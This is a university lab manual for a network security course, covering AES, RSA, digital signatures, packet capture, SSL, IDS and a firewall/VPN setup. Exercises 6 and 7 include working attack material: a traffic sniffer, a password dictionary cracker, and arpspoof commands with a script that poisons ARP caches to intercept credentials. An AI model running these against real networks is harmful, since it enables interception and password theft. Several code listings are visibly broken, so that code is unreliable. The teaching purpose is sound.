DEPARTMENT OF ARTIFICIAL INTELLIGENCE AND DATA SCIENCE

LAB MANUAL

CCS354- NETWORK SECURITY

Regulation 2021
YEAR/SEMESTER:III/VI
Academic Year 2024-2025
 CCS354 – NETWORK SECURITY LABORATORY

PRACTICAL EXERCISES:

1. Implement symmetric key algorithms.

2. Implement asymmetric key algorithms and key exchange algorithms.
3. Implement digital signature schemes.
4. Installation of Wire shark, tcp dump and observe data transferred in client-server
communication using UDP/TCP and identify the UDP/TCP datagram.
5. Check message integrity and confidentiality using SSL.
6. Experiment Eavesdropping, Dictionary attacks, MITM attacks .
7. Experiment with Sniff Traffic using ARP Poisoning .
8. Demonstrate intrusion detection system using any tool.
9. Explore network monitoring tools.
10. Study to configure Firewall, VPN.

PRACTICAL: 30 PERIODS
 TABLE OF CONTENTS
PAGE
S.NO. DATE NAME OF THE EXPERIMENT MARKS SIGN.
NO

1 Implement symmetric key algorithms.

Implement asymmetric key algorithms and

key exchange algorithms
2

3 Implement digital signature schemes

Installation of Wire shark, tcp dump and

4 observe data transferred in client-server
communication using UDP/TCP and identify
the UDP/TCP datagram.

Check message integrity and confidentiality

5 using SSL

Experiment Eavesdropping, Dictionary

6 attacks, MITM attacks
Experiment with Sniff Traffic using ARP
7 Poisoning

Demonstrate intrusion detection system using

8 any tool.

Explore network monitoring tools

9

10 Study to configure Firewall, VPN

 1. IMPLEMENT SYMMETRIC KEY ALGORITHMS
AIM:
To implement and verify the functionality of symmetric key algorithms using the AES encryption
method for secure data transmission.
APPARATUS REQUIRED:
1.Computer with Python installed.
2.Text Editor or IDE (like VSCode or PyCharm).
3.Cryptography Library
PROCEDURE:
1.Open a text editor and create a new C source file.
2. Include necessary header files.
3. Define constants for AES block size.
4. Declare function prototypes for key generation, encryption, decryption, and padding.
5. Implement the key generation function using RAND_bytes() to generate a random key.
6. Implement the padding function to ensure plaintext length is a multiple of the block size.
7. Implement the AES encryption function using AES_encrypt() and the generated key.
8. Implement the AES decryption function using AES_decrypt().
9. Implement the main function to read plaintext input, call the key generation, encryption, and
decryption functions.
10. Compile the program.
11. Run the compiled program.
12. Test the program by inputting plaintext and verifying that the decrypted output matches the
original plaintext.
PROGRAM:
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64
def pad(data):
return data + (16 - len(data) % 16) * chr(16 - len(data) % 16).encode()
def unpad(data):
return data[:-data[-1]]
def encrypt(plain_text, key):
cipher = AES.new(key, AES.MODE_CBC)
ct_bytes = cipher.encrypt(pad(plain_text.encode()))
iv = base64.b64encode(cipher.iv).decode('utf-8')
ct = base64.b64encode(ct_bytes).decode('utf-8')
return iv, ct
def decrypt(iv, ct, key):
iv = base64.b64decode(iv)
ct = base64.b64decode(ct)
cipher = AES.new(key, AES.MODE_CBC, iv)
 pt = unpad(cipher.decrypt(ct))
return pt.decode('utf-8')
if __name__ == "__main__":
key = get_random_bytes(16) # Generate a random 16-byte key
print("Key:", base64.b64encode(key).decode('utf-8'))
plain_text = "This is a secret message"
print("Plain text:", plain_text)
# Encrypt the data
iv, ct = encrypt(plain_text, key)
print("IV:", iv)
print("Cipher text:", ct)
# Decrypt the data
decrypted_text = decrypt(iv, ct, key)
print("Decrypted text:", decrypted_text)

OUTPUT:
Key: lZ1+0bq2... (some random key)
Plain text: This is a secret message
IV: D1cnw3... (random IV)
Cipher text: a3cN5D... (encrypted text)
Decrypted text: This is a secret message

RESULT:
Thus the implementation and operation of symmetric key algorithms using AES for encrypting and
decrypting messages was Successfully verified.
 2. IMPLEMENT ASYMMETRIC KEY ALGORITHMS AND KEY EXCHANGE
ALGORITHMS
AIM:
To implement asymmetric key algorithms (RSA for encryption and decryption) and key exchange
algorithms (Diffie-Hellman) in C, illustrating how secure key exchanges and data encryption work.
APPARATUS REQUIRED:
1.A computer with a C/C++ compiler (such as GCC)
2.Open SSL library for cryptographic functions
3.Basic text editor (like Notepad++, Visual Studio Code, etc.)
PROCEDURE:
1. Create the C source file
2. Include Necessary Libraries
3. Implement RSA Key Generation
4. Implement RSA Encryption and Decryption Functions
5. Implement Diffie-Hellman Key Exchange.
6.Write the Main Function
7. Compile the Program
8. Run the Program
PROGRAM:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/rsa.h>
#include <openssl/pem.h>
#include <openssl/err.h>
// Function to handle errors
void handleErrors() {
ERR_print_errors_fp(stderr);
abort();
}
// RSA Encryption
int rsa_encrypt(RSA *rsa, unsigned char *plaintext, unsigned char *ciphertext) {
int result = RSA_public_encrypt(strlen((char *)plaintext), plaintext, ciphertext, rsa,
RSA_PKCS1_PADDING);
return result;
}
// RSA Decryption
int rsa_decrypt(RSA *rsa, unsigned char *ciphertext, unsigned char *plaintext) {
int result = RSA_private_decrypt(RSA_size(rsa), ciphertext, plaintext, rsa, RSA_PKCS1_PADDING);
return result;
}
int main() {
RSA *rsa = RSA_generate_key(2048, RSA_F4, NULL, NULL);
if (!rsa) handleErrors();
// Encryption
unsigned char *plaintext = (unsigned char *)"Hello, Asymmetric Cryptography!";
unsigned char ciphertext[256];
unsigned char decrypted[256];
int encrypted_length = rsa_encrypt(rsa, plaintext, ciphertext);
if (encrypted_length == -1) handleErrors();
printf("Encrypted message length: %d\n", encrypted_length);
// Decryption
int decrypted_length = rsa_decrypt(rsa, ciphertext, decrypted);
if (decrypted_length == -1) handleErrors();
decrypted[decrypted_length] = '\0'; // Null terminate
printf("Decrypted message: %s\n", decrypted);
// Free the RSA structure
RSA_free(rsa);
return 0;
}

OUTPUT:
Encrypted message length: 256
Decrypted message: Hello, Asymmetric Cryptography!

RESULT:
Thus, the above program was successfully completed and verified the implementation of asymmetric key

algorithms (RSA for encryption and decryption) and a simple framework for key exchange algorithms.
 3.IMPLEMENT DIGITAL SIGNATURE SCHEMES

AIM:

To implement digital signature schemes using RSA, demonstrating how to create and verify

digital signatures to ensure the authenticity and integrity of messages.

APPARATUS REQUIRED:

1.A computer with a C/C++ compiler (e.g., GCC)

2.OpenSSL library for cryptographic functions

3.Basic text editor (like Notepad++, Visual Studio Code, etc.)

PROCEDURE:

1. Create the C source code file.

2. Include Necessary Libraries.

3. Implement RSA Key Generation.

4. Implement Digital Signature Functions.

5. Write the Main Function.

6. Compile the Program.

7. Run the Program.

PROGRAM:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <openssl/rsa.h>

#include <openssl/pem.h>

#include <openssl/err.h>

#include <openssl/sha.h>

// Error handling function

void handleErrors() {

ERR_print_errors_fp(stderr);

abort();

}
// Sign the message

int sign_message(RSA *private_key, unsigned char *message, unsigned char *signature) {

unsigned char hash[SHA256_DIGEST_LENGTH];

SHA256(message, strlen((char *)message), hash);

unsigned int signature_length;

if (RSA_sign(NID_sha256, hash, SHA256_DIGEST_LENGTH, signature, &signature_length,

private_key) != 1) {

handleErrors();

return signature_length;

// Verify the signature

int verify_signature(RSA *public_key, unsigned char *message, unsigned char *signature, unsigned int

signature_length) {

unsigned char hash[SHA256_DIGEST_LENGTH];

SHA256(message, strlen((char *)message), hash);

if (RSA_verify(NID_sha256, hash, SHA256_DIGEST_LENGTH, signature, signature_length,

public_key) != 1) {

return 0; // Signature verification failed

return 1; // Signature verified

int main() {

// Generate RSA keys

RSA *private_key = RSA_generate_key(2048, RSA_F4, NULL, NULL);

if (!private_key) handleErrors();

// Duplicate the private key to create a public key

RSA *public_key = RSAPublicKey_dup(private_key);

if (!public_key) handleErrors();

// Message to be signed

unsigned char *message = (unsigned char *)"This is a digital signature test.";

 unsigned char signature[256];

// Sign the message

int signature_length = sign_message(private_key, message, signature);

printf("Signature Length: %d\n", signature_length);

// Verify the signature

int verification_result = verify_signature(public_key, message, signature, signature_length);

if (verification_result) {

printf("Signature is verified successfully.\n");

} else {

printf("Signature verification failed.\n");

// Free the RSA structures

RSA_free(private_key);

RSA_free(public_key);

return 0;

OUTPUT:

Signature Length: 256

Signature is verified successfully.

RESULT:

Thus, the above program was successfully completed and verified the implementation of

digital signature schemes using RSA. This shows how to create a digital signature for a message

and verify its authenticity and integrity.

 4.INSTALLATION OF WIRE SHARK, TCP DUMP AND OBSERVE DATA

TRANSFERRED IN CLIENT-SERVER COMMUNICATION USING UDP/TCP AND

IDENTIFY THE UDP/TCP DATAGRAM.

AIM:

To install Wireshark and TCPDump, capture packets during client-server communication

over UDP/TCP, and identify the datagram

APPARATUS REQUIRED:

1.A computer (Windows, Linux, or macOS)

2.Administrative privileges to install necessary software

3.Internet connection for downloading software.

PROCEDURE:

1.Install Wireshark

2. Install TCPDump

3. Setup Client-Server Communication

4. Capture Network Traffic

5. Identify Datagrams

PROGRAM:

TCP Server and Client

TCP Server (tcp_server.py)

import socket

def tcp_server():

# Create a TCP socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to a host and port

server_socket.bind(('localhost', 12345))

# Listen for incoming connections

server_socket.listen(1)

print("TCP Server is listening on port 12345...")

 # Accept a connection

conn, addr = server_socket.accept()

print(f"Connection from {addr}")

# Send a message to the client

message = "Hello from TCP server"

conn.sendall(message.encode())

# Close the connection

conn.close()

print("Connection closed.")

if __name__ == "__main__":

tcp_server()

TCP Client (tcp_client.py)

import socket

def tcp_client():

# Create a TCP socket

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server

client_socket.connect(('localhost', 12345))

# Receive data from the server

data = client_socket.recv(1024)

print(f"Received from server: {data.decode()}")

# Close the connection

client_socket.close()

if __name__ == "__main__":

tcp_client()

UDP Server and Client

UDP Server (udp_server.py)

import socket

def udp_server():

# Create a UDP socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Bind the socket to a host and port

server_socket.bind(('localhost', 12345))

print("UDP Server is listening on port 12345...")

while True:

# Receive data from the client

data, addr = server_socket.recvfrom(1024)

print(f"Received from {addr}: {data.decode()}")

if data.decode() == "exit":

print("Exiting server.")

break

# Close the socket

server_socket.close()

if __name__ == "__main__":

udp_server()

UDP Client (udp_client.py)

import socket

def udp_client():

# Create a UDP socket

client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Define server address

server_address = ('localhost', 12345)

# Send a message to the server

message = "Hello from UDP client"

 client_socket.sendto(message.encode(), server_address)

# Optionally, send an exit message to stop the server

# client_socket.sendto("exit".encode(), server_address)

# Close the socket

client_socket.close()

if __name__ == "__main__":

udp_client()

OUTPUT:

TCP

Server Output:

TCP Server is listening on port 12345...

Connection from ('127.0.0.1', some_port)

Connection closed.

Client Output:

Received from server: Hello from TCP server

For UDP:

Server Output:

UDP Server is listening on port 12345...

Received from ('127.0.0.1', some_port): Hello from UDP client

RESULT:

The installation of Wireshark and TCPDump was successful, allowing for the capturing and

analysis of network packets during client-server communication. The datagrams exchanged

over TCP (or UDP, if using that protocol) can be identified by filtering in Wireshark,

showcasing effective network traffic analysis and communication debugging.

 5.CHECK MESSAGE INTEGRITY AND CONFIDENTIALITY USING SSL

AIM:

To demonstrate and verify the message integrity and confidentiality in data transmission

using SSL/TLS protocols.

APPARATUS REQUIRED:

1.Two Computers or Virtual Machines (Client and Server).

2.OpenSSL: A robust SSL/TLS toolkit (installed on both client and server).

3.Python or any script language: for sending and receiving messages over a secure connection.

4.Text Editor: Any text editing software.

PROCEDURE:

1. Install OpenSSLeSSL Certificate

2. Generate a private key

3. Generate a self-signed certificate

4. Create a Python script (ssl_server.py)

5. Run the SSL server

6. Create a Python script (ssl_client.py)

7. Run the SSL Client In A Separate terminal

PROGRAM:

Python script (ssl_server.py)

import socket

import ssl

# Create a TCP/IP socket

bindsocket = socket.socket()

bindsocket.bind(('localhost', 8443))

bindsocket.listen(5)

# Wrap socket with SSL

server_socket = ssl.wrap_socket(bindsocket,
 keyfile="server.key",

certfile="server.crt",

server_side=True)

print("Server listening on port 8443...")

while True:

newsocket, fromaddr = server_socket.accept()

try:

data = newsocket.recv(1024)

print("Received:", data.decode('utf-8'))

newsocket.send(b"Message received securely.")

finally:

newsocket.close()

Python script (ssl_client.py)

import socket

import ssl

# Create a socket and wrap it with SSL

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

ssl_sock = ssl.wrap_socket(sock)

# Connect to the server

ssl_sock.connect(('localhost', 8443))

ssl_sock.send(b"Hello, secure world!")

# Receive a response

response = ssl_sock.recv(1024)

print("Server response:", response.decode('utf-8'))

# Close the connection

ssl_sock.close()
OUTPUT:

server -Received: Hello, secure world!

Client- Server response: Message received securely.

RESULT:

Thus the message is encrypted and tamper-proof, ensuring the integrity and confidentiality

of the message using SSL.

 6.EXPERIMENT EAVESDROPPING, DICTIONARY ATTACKS, MITM ATTACKS
AIM:
To Demonstrate Various Network Security Threats And Vulnerabilities.

APPARATUS REQUIRED:

1.Two computers (or a computer and a mobile device)

2.Network switch or hub

3.Packet sniffer software (e.g., Wireshark)

4.A password list (dictionary file) for dictionary attacks

5.A sample application to transmit data (e.g., a web application or chat application)

6.MITM attack tool (e.g., Ettercap, Bettercap)

PROCEDURE:

1. Set up two devices on the same network.

2. Install and configure Wireshark on the monitoring device.

3.Start a communication session (e.g., send messages or browse a website) on one device.

4. Use Wireshark to capture packets and demonstrate eavesdropping.

5. On the second computer, install a password-cracking tool and attempt to crack weak passwords

using the prepared password list, demonstrating a dictionary attack.

6. Use the MITM tool to initiate ARP spoofing on the attacker device, intercepting traffic between

the victim and the target server.

7. On the monitoring device, run Wireshark to capture and analyze the intercepted packets,

demonstrating an MITM attack.

8. Modify (if possible) the intercepted data packets to show the potential impact of an MITM

attack.

9. Analyze the results and outcomes of each demonstration to highlight the risks and vulnerabilities

associated with these network security threats

PROGRAM:

1.Eavesdropping

from scapy.all import sniff, TCP, Raw

def packet_callback(packet):
 if packet.haslayer(TCP) and packet.haslayer(Raw):

print("Source IP:", packet[IP].src)

print("Destination IP:", packet[IP].dst)

print("Source Port:", packet[TCP].sport)

print("Destination Port:", packet[TCP].dport)

print("Payload:", packet[Raw].load.decode())

print("------------------------")

sniff(prn=packet_callback, store=False)

Output:

Source IP: 192.168.1.100

Destination IP: 192.168.1.1

Source Port: 1234

Destination Port: 80

Payload: GET / HTTP/1.1

Host: 192.168.1.1

Source IP: 192.168.1.100

Destination IP: 192.168.1.1

Source Port: 1234

Destination Port: 80

Payload: HTTP/1.1 200 OK

2. Dictionary Attack

import hashlib

def crack_password(hash, dictionary_file):

with open(dictionary_file, 'r') as file:

for line in file:

word = line.strip()

if hashlib.sha256(word.encode()).hexdigest() == hash:

return word
 return None

hash = "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8"

dictionary_file = "dictionary.txt"

password = crack_password(hash, dictionary_file)

if password:

print("Password cracked:", password)

else:

print("Password not cracked")

Dictionary File (dictionary.txt):

password123

123456

qwerty

password

Output:

Password cracked: password

3. Man-in-the-Middle (MITM) Attack:

from scapy.all import ARP, Ether, srp

def arp_spoofing(ip, mac):

packet = ARP(pdst=ip, hwdst=mac, psrc="192.168.1.1")

srp(packet, timeout=2, verbose=0)[0]

ip = "192.168.1.100"

mac = "00:11:22:33:44:55"

arp_spoofing(ip, mac)

Output:

Sent 1 packets.

RESULT:

Thus the vulnerabilities in network security through eavesdropping, dictionary attacks, and

Man-in-the-Middle attacks, highlighting the ease with which sensitive information can be

intercepted.
 7. EXPERIMENT WITH SNIFF TRAFFIC USING ARP POISONING

AIM:

To demonstrate how ARP (Address Resolution Protocol) poisoning can be used to intercept

network traffic between two devices on a local network.

APPARATUS REQUIRED:

1. Two computers or virtual machines (VMs) within the same local network.

2. A third computer or VM to perform the attack.

3. Kali Linux or another penetration testing distribution (for the attacking machine).

4. Wireshark or a similar packet sniffing tool.

5. Required software tools like arpspoof or ettercap.

PROCEDURE:

1. Ensure two devices are connected to the same local network (Device A and Device B).

2. Use a third device (Attacker) with Kali Linux or a similar OS.

3. Make sure `ettercap` or `arpspoof` is installed on the Attacker device.

4. Install Wireshark for packet capturing on the Attacker device.

5. On the Attacker, use the command:

arp -a

6. Note the IP addresses of Device A and Device B.

7. Start Wireshark on the Attacker to capture the network traffic.

8. Run the command to enable IP forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

9. In a terminal, use the following command to poison the ARP cache, directing traffic from

Device A to the Attacker:

sudo arpspoof -i <interface> -t <Device_A_IP> <Device_B_IP>

10. In another terminal, direct traffic back to Device B:

sudo arpspoof -i <interface> -t <Device_B_IP> <Device_A_IP>

11.Watch the traffic being captured in Wireshark for any sensitive data.

12.Close the terminals or stop the `arpspoof` processes when you're done capturing traffic.
PROGRAM:

#!/bin/bash

# A simple ARP poisoning script

if [ "$#" -ne 3 ]; then

echo "Usage: $0 <interface> <target_IP> <gateway_IP>"

exit 1

fi

INTERFACE=$1

TARGET_IP=$2

GATEWAY_IP=$3

# Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP spoofing

(xterm -e "arpspoof -i $INTERFACE -t $TARGET_IP $GATEWAY_IP") &

(xterm -e "arpspoof -i $INTERFACE -t $GATEWAY_IP $TARGET_IP") &

Wait

OUTPUT:

The captured packets displayed in Wireshark will show all data being transmitted

between the target device and the gateway, including potentially sensitive information such

as usernames and passwords.

RESULT:

The experiment successfully demonstrates the vulnerability of ARP to poisoning attacks,

allowing the attacker to intercept and analyze traffic on the local network. The results highlight

the importance of implementing security measures such as static ARP entries, using VPNs, and

employing encryption to protect sensitive data during transmission.

 8.DEMONSTRATE INTRUSION DETECTION SYSTEM USING ANY TOOL
AIM:
To demonstrate the functioning of an Intrusion Detection System (IDS) using a specific

tool to monitor and analyze network traffic for malicious activities.

APPARATUS REQUIRED:
1.Computer or virtual machine running a Linux distribution (e.g., Ubuntu).

2.Any of the following IDS tools:

Snort: A widely-used open-source IDS software.

Suricata: Another open-source IDS/IPS engine.

OSSEC: A host-based intrusion detection system.

3.Terminal for command-line access.

4.Sample malicious traffic (can be simulated).

PROCEDURE:
1.Install the chosen IDS tool on your Linux machine. For example, to install Snort, use

sudo apt update

sudo apt install snort

2.Configure Snort by editing the configuration file (usually located at /etc/snort/snort.conf).

3.Set the network interface Snort will monitor (e.g., eth0).

4. Ensure that there are rules defined for detecting intrusions.

5. Run Snort in packet capture mode

sudo snort -A console -i eth0 -c /etc/snort/snort.conf

6. This command will start Snort in the console mode, displaying alerts directly in the terminal.

7. From another machine on the same network or from a local script, generate some malicious

traffic. For demonstration, you could use a simple ping flood or Nmap scan:

CopyReplit

8.Watch the Snort console for any alerts generated from the malicious activity.

9. Review the logs generated by Snort, typically found in the /var/log/snort/ directory (if logging is

enabled in the configuration).

PROGRAM:

from scapy.all import

def detect_http_get(packet):

# Check if the packet has a TCP layer and contains an HTTP GET request

if packet.haslayer(TCP) and packet.haslayer(Raw):

payload = packet[Raw].load.decode('utf-8', 'ignore')

if "GET" in payload:

print(f"ALERT: HTTP GET Request detected from {packet[IP].src} to {packet[IP].dst}")

# Sniff packets on the specified interface (e.g., eth0)

def main():

print("Listening for HTTP GET requests...")

sniff(filter="tcp port 80", prn=detect_http_get, store=0)

if __name__ == "__main__":

main()

OUTPUT:

Listening for HTTP GET requests...

ALERT: HTTP GET Request detected from 192.168.1.5 to 192.168.1.2

RESULT:

This demonstration highlights the capability of an IDS to provide real-time monitoring and

alerting of network activity, ensuring better security and detection of potentially malicious behavior.
 9. EXPLORE NETWORK MONITORING TOOLS
AIM:

To explore the functionality, capabilities, and application of various network monitoring

tools

to capture, analyze, and detect network traffic patterns, anomalies, and potential security threats.

APPARATUS REQUIRED:

1.Hardware:

A computer or server (Linux-based preferred)

Additional machines/devices in a local network for testing

Network cables (if using physical devices)

2.Software:

Snort: Intrusion Detection and Prevention System

Wireshark: Network protocol analyzer

tcpdump: Command-line packet analyzer

Open vSwitch (optional): For creating virtual networks

Web Server (Apache/Nginx): To generate HTTP traffic

Test client tools: curl, wget, or browsers to simulate network activity

PROCEDURE:

1.Install Snort, Wireshark, and tcpdump on your Linux machine.

2. Set up a basic web server (e.g., Apache) to generate HTTP traffic by installing it as follows

sudo apt install apache2

sudo systemctl start apache2

3. Edit the Snort configuration file (/etc/snort/snort.conf) to set HOME_NET and include custom

rules.

4. Execute Snort in the terminal

sudo snort -A console -c /etc/snort/snort.conf -i eth0

5.Use a browser or command-line tools to generate HTTP requests

curl http://localhost

6. Open Wireshark, select the interface (e.g., eth0), and start capturing packets.
7.Apply filters to display only HTTP traffic.

8. Capture Traffic with tcpdump.

9. Open a terminal and run

sudo tcpdump -i eth0 -n 'port 80'

PROGRAM:

Snort Configuration

Create a Custom Rule in local.rules

# File: /etc/snort/rules/local.rules

alert tcp any any -> any 80 (msg:"HTTP GET Request Detected"; content:"GET"; http_method;

sid:1000001;)

Run Snort

# Run Snort with the custom rule in console mode

sudo snort -A console -c /etc/snort/snort.conf -i eth0

Generate HTTP Traffic

# Generate HTTP GET request to http://localhost

curl http://localhost

Capture Traffic with Wireshark

# Capture HTTP traffic on eth0

sudo tcpdump -i eth0 -n 'port 80'

OUTPUT:
Snort Console Output
[**] [1:1000001:0] HTTP GET Request Detected [**]
[**] [Priority: 0] [192.168.1.10:12345 -> 192.168.1.20:80] [**]
Wireshark Capture-A list of captured HTTP packets showing request and response data when

applying filters for HTTP traffic.

tcpdump Output-15:04:12.123456 IP 192.168.1.10.12345 > 192.168.1.20.80: Flags [P.], seq 1:5,

ack 1, win 65535, length 4

RESULT:

The experiment successfully demonstrates the capabilities of network monitoring tools in

detecting and analyzing network .

 10.STUDY TO CONFIGURE FIREWALL, VPN
AIM:
To study the configuration and management of a Firewall and a Virtual Private Network

(VPN) in order to enhance network security and secure remote access.

APPARATUS REQUIRED:

1.Hardware:

A computer (Linux-based preferred, e.g., Ubuntu)

A second device (desktop or laptop) to simulate remote access.

Network cables (if using physical devices)

Router to test firewall functions on.

2.Software:

Firewall Software: UFW (Uncomplicated Firewall) or iptables

VPN Software: OpenVPN or WireGuard

Text editor (e.g., Vim, Nano, or any GUI-based editor)

Terminal/Shell access

PROCEDURE:

Configure the Firewall using UFW

1. Install UFW.

2. Check the status of UFW

3. Allow SSH (port 22) for remote access

4. Deny all other incoming connections

5. Allow outgoing connections

6. Enable UFW

7. Check the status again

Configure the VPN using OpenVPN

1. Install OpenVPN

2. Set up the EasyRSA for creating certificates

3. Edit the vars file to configure CA variables

4. Build the Certificate Authority

 5. Generate server certificate and key

6. Generate client certificate and key

7. Create Diffie-Hellman keys

8. Create a configuration file for the OpenVPN server

9. Start OpenVPN service

10. Enable OpenVPN to start on boot

PROGRAM:

Client Configuration File

client

dev tun

proto udp

remote [YOUR_SERVER_IP] 1194

resolv-retry infinite

nobind

persist-key

persist-tun

ca ca.crt

cert client1.crt

key client1.key

cipher AES-256-CBC

verb 3

OUTPUT:

After Firewall Configuration

Status: active To Action From

OpenSSH ALLOW Anywhere

After VPN Connection

[YOUR_SERVER_IP]:1194) 200 OK: Channel: client 0

RESULT:

The experiment effectively demonstrated the configuration of both a firewall (using UFW)

and a secure VPN (using OpenVPN). Implementing firewalls and VPNs significantly increases

network security, allowing for controlled access and secure remote connections.